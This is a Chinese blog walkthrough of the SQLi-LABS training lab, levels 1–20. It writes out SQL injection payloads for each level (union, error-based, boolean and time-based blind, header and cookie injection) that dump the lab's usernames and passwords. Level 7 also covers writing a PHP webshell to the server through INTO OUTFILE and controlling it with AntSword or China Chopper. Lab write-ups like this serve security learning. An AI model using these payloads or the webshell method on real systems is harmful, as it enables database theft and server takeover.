SQLi-LABS(Basic Injections)

最新推荐文章于 2024-08-17 12:04:18 发布
最新推荐文章于 2024-08-17 12:04:18 发布
阅读量116 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59022585/article/details/131851539
版权

目录

Less-1(GET - Error based - Single quotes - String)

判断回显类型

确定回显位置

回显获取数据

Less-2(GET - Error based - Intiger based)

判断注入类型

确定回显位置

回显获取数据

Less-3(GET - Error based - Single quotes with twist - string)

判断注入类型

使用报错回显数据

Less-4(GET - Error based - Double Quotes - String)

判断注入类型和确定注入闭合方式

确定回显位置

回显获取数据

Less-5(GET - Double Injection - Single Quotes - String)

判断注入型

报错回显数据

Less-6(GET - Double Injection - Double Quotes -String)

判断注入型

报错方式回显数据

Less-7(GET - Dump into outfile - String)

判断注入型和闭合方式

Burp Suite爆破数据(行不通)

使用盲注爆破脚本爆破数据

木马植入直接读取数据

判断回显数

向服务器文件中写入木马

使用工具连接木马

补充:权限设置

Less-8(GET - Blind - Boolian Based - Single Quotes)

判断注入型

Burp Suite爆破数据

Less-9(GET - Blind - Time based, - Single Quotes)

确定注入方法和闭合符号

注意:时间盲注要求

使用BP抓包爆破数据

使用盲注爆破脚本进行时间盲注

Less-10(GET - Blind - Time based - double quotes)

确定注入方式和闭合方式

使用盲注爆破脚本爆破数据

Less-11(POST - Error Based - Single quotes - String)

查看传参形式和判断注入型

确定回显位置

注入回显获取数据

Less-12(POST - Error Based - Double quotes - String - with twist)

确定传值方式和注入型

判断回显位置

回显数据

Less-13(POST - Double Injection - Single quotes - String - with twist)

确定注入型和闭合符

判断回显位置

报错回显数据

Less-14(POST - Double Injection - Single quotes - String - with twist)

确定注入方式

判断回显位置

使用报错回显数据

Less-15(POST - Blind - Boolian/time Based - Single quotes)

判断注入型

获取响应包大小

使用盲注爆破脚本爆破数据

Less-16(POST - Blind - Boolian/Time Based - Double quotes)

判断注入型和闭合符

BP抓包获取响应包大小

盲注爆破脚本获取数据

Less-17(POST - Update Query - Error Based - String)

判断注入点

使用报错注入取数据

Less-18(POST - Header Injection - Uagent field - Error based)

确定注入点

 判断传参个数

使用报错注入回显数据

Less-19(POST - Header Injection - Referer field - Error based)

确定注入点和传值个数

使用报错方式回显数据

Less-20(POST - Cookie injections - Uagent field - error based)

判断注入点和注入型

直接注入回显数据

说明:以取得用户名和密码为通关。

Less-1(GET - Error based - Single quotes - String)

判断回显类型

根据题目提示使用id传值,注入?id=1查看回显。

在上面基础上注入一个和多个单号根据回显不同(奇数时为错误页面,偶数时为正常页面),判断为单引号字符型注入。

确定回显位置

注入?id=1'order by n--+判断最大回显个数。n取1~4,当n为1~3时页面正常,为4时报错(第4列未知),确定最大回显数为3。

注入?id='union select 1,2,3--+确定回显位置为2和3。

回显获取数据

注入?id='union select 1,database(),3--+回显出数据库为security。

注入?id='union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+回显出表为emails、referers、uagents、users。

注入?id='union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' )--+回显出users表的字段为id、username、password。(注意:由于当前数据库可能不是security,所以加上指定数据库条件。)

注入?id='union select 1,2,(select group_concat(username,0x7e,password) from users)--+回显出用户名和密码(每组中间使用~隔开)为Dumb~Dumb、Angelina~I-kill-you、Dummy~p@ssword、secure~crappy、stupid~stupidity、superman~genious、batman~mob!le、admin~admin、admin1~admin1、admin2~admin2、admin3~admin3、dhakkan~dumbo、admin4~admin4。

Less-2(GET - Error based - Intiger based)

判断注入类型

以id为参注入1/1和1/0页面显示不同,判定为数字型注入。

确定回显位置

注入?id=1 order by n--+判断最多存在几个回显位;n为1~3时页面正常,为4时页面报错无第4列;判断最多存在4个回显。

注入?id=-1 union select 1,2,3--+确定回显位置为2和3。

回显获取数据

注入?id=-1 union select 1,2,database()--+回显数据库为security。

注入?id=-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+回显出表emails、referers、uagents、users。

注入?id=-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+回显users表字段为id、username、password。

注入?id=-1 union select 1,2,(select group_concat(username,0x7e,password) from users)--+回显用户名和密码为Dumb~Dumb、Angelina~I-kill-you、Dummy~p@ssword、secure~crappy、stupid~stupidity、superman~genious、batman~mob!le、admin~admin、admin1~admin1、admin2~admin2、admin3~admin3、dhakkan~dumbo、admin4~admin4。

Less-3(GET - Error based - Single quotes with twist - string)

判断注入类型

以id为参注入一个或多个单引号,当为奇数时报错,偶数时正常,确定为字符型注入。

使用报错回显数据

注入?id=1'order by 1--+出现报错,尝试注入?id='and updatexml(1,concat(0x7e,database(),0x7e),1)='回显出数据库为security,同时确定为报错型注入。

注入?id='and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)='回显出表emails、referers、uagents、users。

注入?id='and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)='回显users表字段为id、username、password。

注入?id='and updatexml(1,concat(0x7e,(select group_concat(username,0x20,password) from users),0x7e),1)='回显出部分用户名和密码(每组用空格隔开)。(原因:updatexml一次最多显示32个字符。)

注入?id='and updatexml(1,concat(0x7e,mid((select group_concat(username,0x20,password) from users),n,31),0x7e),1)='回显剩余部分用户名和密码。n取32、63、94、125、156、187。(注意:当最后字符为~表示全部截取完毕,否则依次加31继续截取。)

Less-4(GET - Error based - Double Quotes - String)

判断注入类型和确定注入闭合方式

以id为参注入一个或多个双引号,为奇数时报错,为偶数时正常,判断为双引号字符型注入。

确定回显位置

注入?id=1")order by n--+判断回显数,n取1~4,n为1~3时页面正常,4时报出没有第4列。
由于注入一个双引号时报错内容中闭合方式中存在一个右括号,则绕过时需要加上右括号。

注入?id=")union select 1,2,3--+判断回显位置为2和3。

回显获取数据

注入?id=")union select 1,2,database()--+回显出数据库为security。

注入?id=")union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+回显出表emails、referers、uagents、users。

注入?id=")union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+回显users表字段。

注入?id=")union select 1,2,(select group_concat(username,0x7e,password) from users)--+回显出用户名和密码Dumb~Dumb、Angelina~I-kill-you、Dummy~p@ssword、secure~crappy、stupid~stupidity、superman~genious、batman~mob!le、admin~admin、admin1~admin1、admin2~admin2、admin3~admin3、dhakkan~dumbo、admin4~admin4。

Less-5(GET - Double Injection - Single Quotes - String)

判断注入型

以id为参注入一个或多个单引号,奇数时报错,偶数时正常。确定为字符型注入。

报错回显数据

观察页面可以推断没有回显位置,直接使用报错注入。注入?id='and updatexml(1,concat(0x7e,database(),0x7e),1)--+回显出数据库为security。

注入?id='and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+回显出表emails、referers、uagents、users。

注入?id='and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+回显出users表字段id、username、password。

注入?id='and updatexml(1,concat(0x7e,(select group_concat(username,0x20,password) from users),0x7e),1)--+回显出部分用户名和密码。

注入?id='and updatexml(1,concat(0x7e,mid((select group_concat(username,0x20,password) from users),n,31),0x7e),1)--+回显剩余部分用户名和密码。(n取32、63、94、125、156、187)

Less-6(GET - Double Injection - Double Quotes -String)

判断注入型

以id为参注入一个或多个双引号,为奇数时报错,为偶数时正常。又根据页面没回显信息,确定为类型为双引号字符报错型注入。

报错方式回显数据

注入?id="and updatexml(1,concat(0x7e,database(),0x7e),1)--+回显数据库为security。

注入?id="and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+回显出表为emails、referers、uagents、users。

注入?id="and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+回显users表字段id、username、password。

注入?id="and updatexml(1,concat(0x7e,mid((select group_concat(username,0x20,password) from users),n,31),0x7e),1)--+回显出用户名和密码。(n取1、32、63、94、125、156、187)

Less-7(GET - Dump into outfile - String)

判断注入型和闭合方式

以id为参注入一个或多个单引号,为奇数时报错,为偶数时正常;判断为字符型注入。

注入?id=1'order by 1--+发现回显报错,尝试注入?id=1'))order by 1--+回显正常;确定回显闭合方式是'))。

Burp Suite爆破数据(行不通)

由于没有回显位置,但正常和报错有不同页面,则可以通过布尔盲注进行爆破数据。
注入?id=1'))and+if(1=1,1,0)--+和?id=1'))and+if(1=2,1,0)--+并使用Burp Suite抓包,尝试使用转发模块发送数据,发现两个应答数据长度一样,这样就无法使用Burp Suite进行盲注爆破。

使用盲注爆破脚本爆破数据

因为脚本是根据数据内容进行判断的,所以不存在Burp Suite中判断不出来。
注入?id=1'))and if(ascii(mid(database(),%d,1))=%d,1,0)--+爆破出数据库为security。

注入?id=1'))and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))=%d,1,0)--+爆破出所有表emails、referers、uagents、users。

注入?id=1'))and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))=%d,1,0)--+爆破出users表字段id、username、password。

注入?id=1'))and if(ascii(mid((select group_concat(username,0x7e,password) from users),%d,1))=%d,1,0)--+爆破出用户名和密码。

木马植入直接读取数据

判断回显数

注入?id=1'))order by n--+判断回显数,n取1~4,1~3时正常回显,4时报错;确定最大回显数为3。

向服务器文件中写入木马

根据提示(Use outfile),注入?id='))union select 1,2,3 into outfile 'C:/14.txt'--+将1,2,3写入C盘14.txt文件中。这里的C盘是服务器C盘。(注意:页面报错可以忽略。)

通过注入?id='))union select 1,2,database() into outfile 'C:/14.txt'--+可以在服务器上获得数据库名,但没什么用,因为一般情况下无法读取服务器文件。

注入?id='))union select 1,2,'' into outfile 'C:/phpstudy/PHPTutorial/WWW/sqli/Less-7/14.php'--+将一句话木马写入服务器。
分析:$_REQUEST接收GET或POST提交的数据,数据名为14。

使用工具连接木马

利用蚁剑连接木马控制服务器。

右键数据操作,添加填写密码可以获取所有数据库。

 

弊端:可能无法知道服务器的www目录和数据库密码,也就无法得到数据库。
利用中国菜刀连接木马控制服务器,无法直接连接到数据库,但可以通过文件管理找到数据库文件目录。

补充:权限设置

要想将数据写入服务器,必须先将服务器中MySQL下的bin目录中my.ini添加secure_file_priv=""。
解释:当secure_file_priv=""表示服务器任何位置都能写入,secure_file_priv=NULL表示不能写入,secure_file_priv=目录表示只能在该目录下写入。
查看secure_file_priv权限命令:show variables like '%secure%';

Less-8(GET - Blind - Boolian Based - Single Quotes)

判断注入型

以id为参注入一个或多个单引号,奇数时页面无显示(报错),偶数时正常回显,判定为字符注入。

Burp Suite爆破数据

由于页面没有回显,则只能通过爆破形式获得数据。
使用Burp Suite抓包并注入?id=1'and+if(length(database())=n,1,0)--+爆破出数据库长度为8。

 

注入?id=1'and+if(mid(database(),n,1)='c',1,0)--+爆出数据库为security。

 

注入?id=1'and+if(length((select+group_concat(table_name)+from+information_schema.tables+where+table_schema='security'))=n,1,0)--+爆总表长度为29。

 

注入?id=1'and+if(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_schema='security'),n,1)='c',1,0)--+爆出总表emails、referers、uagents、users。

  

注入?id=1'and+if(length((select+group_concat(column_name)+from+information_schema.columns+where+table_schema='security'+and+table_name='users'))=n,1,0)--+爆出users表字段长为20。

 

注入?id=1'and+if(mid((select+group_concat(column_name)+from+information_schema.columns+where+table_schema='security'+and+table_name='users'),n,1)='c',1,0)--+爆出users字段为id、username、password。

  

注入?id=1'and+if(length((select+group_concat(username,0x7e,password)+from+users))=n,1,0)--+爆出用户名和密码长度为188。

 

注入?id=1'and+if(mid((select+group_concat(username,0x7e,password)+from+users),n,1)='c',1,0)--+爆出用户名和密码都有两个,不符合规定。

  

将上面的注入语句改为?id=1'and+if(ascii(mid((select+group_concat(username,0x7e,password)+from+users),n,1))=ascii('c'),1,0)--+爆出用户名和密码。(绕过大小写导致的冲突)

 

 

 

Less-9(GET - Blind - Time based, - Single Quotes)

确定注入方法和闭合符号

注入任意字符(串)都是一个页面,则只能使用时间盲注获取数据。
尝试注入1'and sleep(5)--+通过页面响应时间判断出闭合方式为'。

注意:时间盲注要求

更改最大线程数为1,防止响应时间上的冲突。

添加响应时间排序,便于观看爆破结果。

使用BP抓包爆破数据

先使用BP捕获一个数据包,再注入?id=1'and+if(length(database())=n,sleep(3),0)--+爆破出数据库长度为8。

 

注入?id=1'and+if(mid(database(),n,1)='c',sleep(3),0)--+爆出结果每组有两种可能,不符合要求。

 

将字符转成ascii形式绕过大小写矛盾可以爆破出数据,但过于复杂,且爆破后数据被打乱,不便于排序。

使用盲注爆破脚本进行时间盲注

相比较与BP,脚本可以进行排序,即爆破后就是完整数据形式。
注入语句使用?id=1'and+if(ascii(mid(database(),%d,1))=%d,sleep(3),0)--+爆破出数据库名为security。

注入?id=1'and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))=%d,sleep(3),0)--+爆出表为emails、referers、uagents、users。

注入?id=1'and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))=%d,sleep(3),0)--+爆出users表字段为id、username、password。

注入?id=1'and if(ascii(mid((select group_concat(username,0x7e,password) from users),%d,1))=%d,sleep(3),0)--+爆出用户名和密码。

Less-10(GET - Blind - Time based - double quotes)

确定注入方式和闭合方式

注入任何字符(串)页面没有变化,只能使用时间盲注获取数据。
尝试注入1"and sleep(5)--+通过返回时长判断闭合符为"。

使用盲注爆破脚本爆破数据

注入?id=1"and if(ascii(mid(database(),%d,1))=%d,sleep(3),0)--+爆破出数据库security。

注入?id=1"and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))=%d,sleep(3),0)--+爆出表emails、referers、uagents、users。

注入?id=1"and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))=%d,sleep(3),0)--+爆出users表字段id、username、password。

注入?id=1"and if(ascii(mid((select group_concat(username,0x7e,password) from users),%d,1))=%d,sleep(3),0)--+爆出用户名和密码。

Less-11(POST - Error Based - Single quotes - String)

查看传参形式和判断注入型

输入任意用户名和密码,查看F12控制台下网络确定是POST传值,参数分别是uname、passwd、submit。

使用POST方式注入一个或多个单引号,为奇数时报错,为偶数时没显示;判断为字符注入。

确定回显位置

注入'order by n#判断最大回显数。n取1~3,当n为1和2时页面不报错,3则报错(第3列未知)。

注入'union select 1,2#确定回显位置为1和2。

注入回显获取数据

注入'union select 1,database()#回显出数据库为security。

注入'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#回显出表emails、referers、uagents、users。

注入'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')#回显出users表的字段id、username、password。

注入'union select 1,(select group_concat(username,0x7e,password) from users)#回显出用户名和密码。

Less-12(POST - Error Based - Double quotes - String - with twist)

确定传值方式和注入型

输入任意用户名和密码,F12网络查看传值方式为POST。

注入一个或多个双引号,当为奇数时报错,偶数时正常;确定是字符型注入。根据报错内容确定闭合符为")。

判断回显位置

注入")order by n#判断出最大回显数为2。(n取1~3)

注入")union select 1,2#确定回显位置为1和2。

回显数据

注入")union select 1,database()#回显出数据库security。

注入")union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#回显出表emails、referers、uagents、users。

注入")union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')#回显出users表字段id、username、password。

注入")union select 1,(select group_concat(username,0x7e,password) from users)#回显用户名和密码。

Less-13(POST - Double Injection - Single quotes - String - with twist)

确定注入型和闭合符

输入任意用户名和密码,F12网络下查看传参方式和个数。

注入一个或多个单引号,为奇数时报错,为偶数时正常;再根据报错内容确定闭合方式为')。

判断回显位置

注入')order by n#判断回显数为2。(n取1~3)

注入')union select 1,2#没有出现回显位置。

报错回显数据

由于没有回显位置但有报错信息,则注入')and updatexml(1,concat(0x7e,database(),0x7e),1)#报出数据库security。

注入')and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#报出表emails、referers、uagents、users。

注入')and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#报出users表字段id、username、password。

注入')and updatexml(1,concat(0x7e,mid((select group_concat(username,0x20,password) from users),n,31),0x7e),1)#报出部分用户名和密码。(n取1、32、63、94、125、156、187)

Less-14(POST - Double Injection - Single quotes - String - with twist)

确定注入方式

输入任意用户名和密码,F12查看传参形式为POST传参。

注入一个或多个双引号,奇数时报错,偶数时正常;初步认为是字符注入。

判断回显位置

注入"order by n#测试回显数为2,n取1~3。

注入"union select 1,2#发现没有回显位置。

使用报错回显数据

由于没有回显位置,则只能使用报错注入;注入"and updatexml(1,concat(0x7e,database(),0x7e),1)#报出数据库security。

注入"and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#回显表为emails、referers、uagents、users。

注入"and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#报出users表字段id、username、password。

注入"and updatexml(1,concat(0x7e,mid((select group_concat(username,0x7e,password) from users),n,31),0x7e),1)#回显用户名和密码。(n取1、32、63、94、125、156、187)

Less-15(POST - Blind - Boolian/time Based - Single quotes)

判断注入型

输入任意用户名和密码后F12查看传值方式为POST。
注入单引号、双引号、1/1、1/0页面都没有变化。注入'or 1=1#永真式查看是否有回显,发现图标有变化,确定注入方法为布尔盲注。

获取响应包大小

由于页面中成功与失败显示时没有文本显示,所以脚本只能通过包大小判断。
使用BP捕获数据包并注入'or+1=1#重新发送,查看到包大小为1492。

注入'or+1=2#重新发包,验证失败与成功返回的包大小不相等。

使用盲注爆破脚本爆破数据

注入{"uname":"'or if(ascii(mid(database(),%d,1))=%d,1,0)#","passwd":"","submit":"Submit"}爆破数据库security。

注入{"uname":"'or if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))=%d,1,0)#","passwd":"","submit":"Submit"}爆破表。

注入{"uname":"'or if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))=%d,1,0)#","passwd":"","submit":"Submit"}爆破users表字段。

注入{"uname":"'or if(ascii(mid((select group_concat(username,0x7e,password) from users),%d,1))=%d,1,0)#","passwd":"","submit":"Submit"}爆破出用户名和密码。

Less-16(POST - Blind - Boolian/Time Based - Double quotes)

判断注入型和闭合符

输入任意用户名和密码后F12查看传值方式为POST。
注入单引号、双引号、1/1、1/0页面没有变化,注入")or 1=1#页面图标变化;确定闭合符为")。

BP抓包获取响应包大小

由于页面没有回显位,则只能使用盲注。
使用BP抓包后注入")or+1=1#并发送请求,从响应包中得到包长度。

盲注爆破脚本获取数据

注入{"uname":"")or if(ascii(mid(database(),%d,1))=%d,1,0)#","passwd":"","subimt":"Submit"}爆出数据库security。

注入{"uname":"")or if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))=%d,1,0)#","passwd":"","submit":"Submit"}爆出表emails、referers、uagents、users。

注入{"uname":"")or if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))=%d,1,0)#","passwd":"","submit":"Submit"}爆出users表字段。

注入{"uname":"")or if(ascii(mid((select group_concat(username,0x7e,password) from users),%d,1))=%d,1,0)#","passwd":"","submit":"Submit"}爆出用户名和密码。

Less-17(POST - Update Query - Error Based - String)

判断注入点

输入任意用户名和密码,F12查看传值方式为POST。

在uname参数位置进行注入,发现无论任何字符页面都没有变化。猜测注入点不在uname参数位置。
使用BP爆破用户名和密码,得到用户000000有效;密码是无效的,根据页面提示本题机制是密码更新。即根据用户名对密码进行更新。

  

尝试使用passwd参数为进行注入,注入一个或多个单引号,奇数时报错,偶数时正常。

使用报错注入取数据

由于没有回显位置,则可以使用报错注入获得数据。注入'and updatexml(1,concat(0x7e,database(),0x7e),1)#报出数据库security。

注入'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#报出表emails、referers、uagents、users。

注入'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#报出uses表字段id、username、password。

由于报错信息都源自于users本身,则在子查询中无法查询本表数据,即无法获取用户名和密码。

Less-18(POST - Header Injection - Uagent field - Error based)

确定注入点

输入任意用户名和密码,F12查看网络确定是POST传值方式。
在uname和passwd参数位置注入单引号、双引号、1/1、1/0等,页面都没有变化。使用BP进行用户名和密码爆破,得到一组有效信息。

 

根据观察回显信息确定是User-Agent值;尝试在User-Agent位置注入一个或多个单引号,奇数时回显注入值并报错,偶数时回显注入值。

 判断传参个数

注入一个单引号根据报错内容判断后面还有两个参数;且最后闭合符为)。(参数之间使用,分隔)

注入',1,1)#发现页面正常,确定注入参数为3个。

使用报错注入回显数据

由于页面存在报错提示,则可以使用报错注入回显数据;注入'and updatexml(1,concat(0x7e,database(),0x7e),1),1,1)#回显数据库security。

注入'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1),1,1)#回显表emails、referers、uagents、users。

注入'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1),1,1)#回显users表字段id、username、password。

注入'and updatexml(1,concat(0x7e,mid((select group_concat(username,0x20,password) from users),n,31),0x7e),1),1,1)#回显用户名和密码。(n取1、32、63、94、125、156、187)

Less-19(POST - Header Injection - Referer field - Error based)

确定注入点和传值个数

输入任意用户名和密码,并使用BP抓包;再使用爆破方法爆破出一组有效用户名和密码(000000/000000)。
传入有效地用户名和密码,得到一行回显,且对应于Referer值,推测Referer为注入点。

在注入点Referer中注入一个单引号,页面回显报错。

根据报错的信息可以知道闭合符末尾是)。注入')#报错提示列数不匹配(传值点不只有一个)。

注入',1)#页面正常回显,推断传值位置数为2个。

使用报错方式回显数据

由于没有直接的回显位置,但可以通过报错方式回显信息;则注入'and updatexml(1,concat(0x7e,database(),0x7e),1),1)#回显出数据库为security。

注入'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1),1)#回显表emails、referers、uagents、users。

注入'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1),1)#回显users表字段id、username、password。

注入'and updatexml(1,concat(0x7e,mid((select group_concat(username,0x20,password) from users),n,31),0x7e),1),1)#回显用户名和密码。(n取1、32、63、94、125、156、187)

Less-20(POST - Cookie injections - Uagent field - error based)

判断注入点和注入型

输入任意用户名和密码,并使用BP进行抓包爆破出一组有效地用户名和密码(000000/000000)。

 

根据页面中的提示,猜测注入点是Cookie。
在页面中输入有效的一组用户名和密码,同时BP进行抓包;再通过BP放包找到具有Cookie的数据包。

在Cookie中注入一个单引号,页面出现报错。

注入'or+1=1#永真式查看页面回显。

注入'order+by+n#判断回显数为3。(n取1~4)

注入'union+select+1,2,3#判断回显位置为1、2、3。

直接注入回显数据

注入'union+select+database(),2,3#回显出数据库为security。

注入'union+select+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema='security'),2,3#回显表为emails、referers、uagents、users。

注入'union+select+(select+group_concat(column_name)+from+information_schema.columns+where+table_schema='security'+and+table_name='users'),2,3#回显出users表字段id、username、password。

注入'union+select+(select+group_concat(username,0x7e,password)+from+users),2,3#回显用户名和密码。

XingHeCX330
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1679
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
SQLI-LABS(Basic Challenges)
volcano的博客
12-04 1018
sql注入 SQL注入是比较常见的网络攻击方式之一,一般分为数字型和字符型,攻击者在HTTP请求中输入含有恶意构造且语法合法的SQL语句,只要应用程序中没有做严格的处理(例如校验或预拼接),那么就会出现SQL注入漏洞危险。 Sqli-labs Sqli-labs-master是一个用来学习sql注入的闯关游戏。 之前看的教程中,普通题目大多数都是用union联合查询注入的,我用的是基于updatexml()函数的报错注入,这里也是参考大佬的博客慢慢学习。 函数解释:   UPDATEXML (XML_doc
sqli-labs闯关笔记(Basic Injections)
末初的CSDN博客
05-05 1268
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs Less-1 单引号报错注入GET 对传入的id参数单引号包裹,并且未作任何出参处理 对单引号闭合,联合查询注入即可 可以看下当传入payload是如何拼接闭合进行注入的 http://127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,user(...
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 889
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
sqli-labs-master-Basic injections解析
ve9etable的博客
11-08 859
目录 lesson 1 单引号,字符型注入 lesson2 单引号,数字型注入 lesson3 单引号、括号、字符型注入 lesson4 双引号,字符型注入 lesson5 单引号,group by报错注入 lesson6 双引号,group by报错注入 lesson7 读写文件 lesson8 布尔盲注 lesson9 单引号,延时注入 lesson10 双引号,延时注入 lesson11 单引号,联合查询注入 lesson 12 双引号,括号,联合查询注...
sqli-labs通关汇总-page1
m0_37638874的博客
05-31 1125
前言: 刚辞去变压器方面的工作,准备回归老本行,干渗透测试了。 本文章意在学习SQL注入并结合源代码学习PHP。 借助的是sqli-labs靶场,此靶场是搭在本地的,原因不想在虚拟机里下常用的软件了,如何搭建大家自己搜吧,这里不赘述了。 我们已关卡的方式,边过关边学习 我个人认为这篇文章适合初学走细节的人看 less-1 我们直接贴一下第一关的php源码 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
SQLi-LABS Page-1(Basic Challenges(基本挑战))
weixin_72459450的博客
07-06 588
8,输入错误的账号,密码(防止影响输出结果)使用 union select 1,group_concat(concat_ws(':',username,password)) from security.users语句,得到:Dumb:1,Angelina:1,Dummy:1,secure:1,stupid:1,superman:1,batman:1,admin:admin,admin1:1,admin2:1,admin3:1,dhakkan:1,admin4:1。
sqli-labs-Page-1 Basic Injections
qq_40001098的博客
08-17 327
SQL注入学习记录
sqli-labs教程——Less 11-20
Lilin's博客
01-21 1363
sqli-labs教程——Less 11-20 Page-1 Basic Challenges准备工具Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)1. 判断是否有注入点2. 判断闭合字符3. 判断当前页面中SQL语句的查询列数4. 判断数据在页面中回显位置和SQL语句中回显位5. 判断当前页面连接的数据库名称6. 显示security数据库中所有表名称信息7. 判断users表的列名称信息8. 查询users表
Sqli-labs全套(1-65)-通关笔记
TyRant的博客
04-10 4463
Basic Challenges 01-Error Based-Single quotes Error Based: 可以通过报错知道闭合方式 > paylod: ?id=1') and ;--+ 源码拼接后: SELECT * FROM users WHERE id=('$id') LIMIT 0,1; SELECT * FROM users WHERE id=('1') and ;-- ') LIMIT 0,1; > err: You have an error in your SQL
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8449
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
1446-基于51单片机的气压检测(MPX4115,上位机,LCD)proteus,原理图、流程图、物料清单、仿真图、源代码
09-06
